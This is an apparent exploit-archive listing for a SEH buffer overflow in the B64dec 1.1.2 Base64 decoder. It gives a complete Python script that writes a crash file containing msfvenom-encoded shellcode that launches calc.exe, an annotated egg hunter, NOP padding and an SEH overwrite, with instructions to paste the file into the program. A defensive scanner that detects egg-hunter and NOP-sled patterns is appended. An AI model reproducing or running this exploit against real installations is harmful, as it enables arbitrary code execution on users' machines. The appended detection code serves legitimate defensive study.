Published on April 14th, 2020

B64dec 1.1.2 Buffer Overflow

# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86

# Instructions:
# Run the script to create the crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.

f = open("crash.txt", "wb")

# Egg tag written twice, followed by a NOP sled; the egg hunter below scans memory for it
padding1 = b"ERCDERCD"
padding1 += b"\x90" * 100

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

# Egg hunter: walks memory from ebp upwards until it finds the tag, then jumps to it
egghunter = b"\x8B\xFD"                  # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44"     # mov eax,45525344 ERCD
egghunter += b"\x47"                     # inc edi
egghunter += b"\x39\x07"                 # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xFB"                 # jne (back to inc edi)
egghunter += b"\x39\x07"                 # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xF7"                 # jne (back to inc edi)
egghunter += b"\xFF\xE7"                 # jmp edi

buf = padding1 + payload                            # egg, sled and payload come first
buf += b"\x90" * (580 - len(padding1 + payload))    # pad so the hunter sits at offset 580
buf += egghunter
buf += b"\x90" * (620 - len(buf))                   # pad up to the SEH record
buf += b"\x90\x90\xEB\xCE"                           # nSEH: short jmp back (-0x32) into the NOPs before the hunter
buf += b"\x86\x1e\x40"  # 00401e86                  # SEH handler, little-endian, leading null byte omitted

f.write(buf)
f.close()
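For the defensive side, here is an added triage helper (not part of the advisory and not the exploit author's code) that scans a captured input blob for the markers this crash file exhibits: the egg-hunter opcode idiom with its tag pulled out of the `mov eax` immediate, the doubled egg tag that the hunter looks for, a long NOP sled, and an oversized input. `MAX_SAFE_LEN`, the sled threshold, `build_sample` and the sample buffer it constructs (filler bytes stand in for the shellcode) are assumptions, not values from the advisory.

```python
"""Triage scan of a captured input blob for egg-hunter, NOP-sled and
oversized-input indicators.  Added example; thresholds and sample data are
assumptions, not values from the advisory."""
import re
from typing import Dict, Optional

# Opcode idiom of the egg hunter in the listing: mov edi,ebp / mov eax,TAG /
# inc edi / cmp [edi],eax / jne rel8 / cmp [edi],eax / jne rel8 / jmp edi.
EGGHUNTER_RE = re.compile(
    rb"\x8b\xfd"
    rb"\xb8(.{4})"       # the 4-byte tag is the immediate of mov eax
    rb"\x47"
    rb"\x39\x07\x75."
    rb"\x39\x07\x75."
    rb"\xff\xe7",
    re.DOTALL,
)

# Assumed safe input length for the decoder (the listing overwrites SEH
# beyond offset 620, so anything this long deserves a second look).
MAX_SAFE_LEN = 512
# Assumed minimum run of 0x90 bytes that counts as a NOP sled.
MIN_SLED = 32
NOP = b"\x90"


def longest_nop_run(blob: bytes) -> int:
    """Length of the longest run of 0x90 bytes (a classic NOP sled)."""
    best = 0
    for m in re.finditer(rb"\x90+", blob):
        best = max(best, len(m.group(0)))
    return best


def find_egghunter(blob: bytes) -> Optional[dict]:
    """Locate the egg-hunter idiom and extract its tag from the mov eax immediate."""
    m = EGGHUNTER_RE.search(blob)
    if not m:
        return None
    tag = m.group(1)
    # The hunter compares [edi] with eax, so a live egg is the tag written
    # twice back to back somewhere in the same blob (-1 if absent).
    egg_offset = blob.find(tag * 2)
    return {"offset": m.start(), "tag": tag, "egg_offset": egg_offset}


def scan_input(blob: bytes) -> Dict[str, object]:
    """Return the indicators found; 'suspicious' is True if any of them fires."""
    hunter = find_egghunter(blob)
    findings: Dict[str, object] = {
        "length": len(blob),
        "oversized": len(blob) > MAX_SAFE_LEN,
        "nop_run": longest_nop_run(blob),
        "egghunter": hunter,
    }
    findings["suspicious"] = bool(
        findings["oversized"] or findings["nop_run"] >= MIN_SLED or hunter
    )
    return findings


def build_sample(tag: bytes = b"ERCD") -> bytes:
    """Constructed stand-in for crash.txt: egg, NOP sled, filler, hunter, padding.
    The payload region is 'A' bytes rather than shellcode."""
    hunter = (b"\x8b\xfd\xb8" + tag + b"\x47"
              + b"\x39\x07\x75\xfb\x39\x07\x75\xf7\xff\xe7")
    buf = tag * 2 + NOP * 100 + b"A" * 300
    buf += NOP * (580 - len(buf)) + hunter
    return buf + NOP * (640 - len(buf))


if __name__ == "__main__":
    # A short base64 string (constructed) versus the constructed crash-like buffer.
    for label, blob in (("benign", b"SGVsbG8gd29ybGQ="), ("sample", build_sample())):
        print(label, scan_input(blob))
```

The regex keys on the full eight-instruction idiom rather than on individual bytes, so ordinary base64 text does not trip it, and the tag is read out of the hunter itself rather than hard-coded, which lets the same scan flag a hunter that uses a different tag than ERCD.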
